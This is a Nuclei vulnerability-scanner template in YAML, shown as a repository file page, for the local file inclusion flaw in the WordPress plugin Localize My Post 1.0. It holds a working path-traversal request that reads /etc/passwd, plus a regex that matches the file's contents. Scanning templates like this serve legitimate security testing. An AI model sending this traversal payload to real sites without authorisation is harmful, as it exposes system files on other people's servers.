nuclei-templates/vulnerabilities/wordpress/wp-localize-post-lfi.yaml

19 lines
482 B
YAML
Raw Normal View History

2021-05-27 03:15:53 +00:00
id: wp-localize-post-lfi
info:
name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body